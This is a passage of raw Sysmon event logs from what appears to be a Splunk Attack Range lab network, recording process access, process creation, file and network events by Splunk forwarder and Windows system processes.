Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:24.274{0C1E0330-F8B4-60EB-EA79-00000000D001}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.976{0C1E0330-F8B5-60EB-EC79-00000000D001}208344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.851{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.836{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810654Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.836{0C1E0330-F8B5-60EB-EC79-00000000D001}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810653Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.382{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACD41027F6DDC9A12EB8891E416445F9,SHA256=A6DC4B9A047A954D5BEEA7387610B89D2672AB5519FC9D07FE3FA3BD6575152C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:16.561{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61996-false10.0.1.12-8000- 23542300x80000000000000001055274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:25.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C9D4A8DCF4497CDF3F0A66B173D4B17,SHA256=5173917E522466C873E8D6B4773E1E70ED5080A853339B15F710762F804B6480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810652Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.304{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F3F15B693D4B9158FA0E1C869D1A07,SHA256=4214CA253B511B055CA81F0C908E35D98E9BA13A1C40E955A892B381B95B995D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810651Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.304{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=239D8D471657A283813C3FB6BB80206A,SHA256=D5636E46A29A0289DEEEB060981A745ED95893E99BA0607585CB6FF87658C8F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.179{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B5-60EB-EB79-00000000D001}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.179{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.179{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:25.164{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 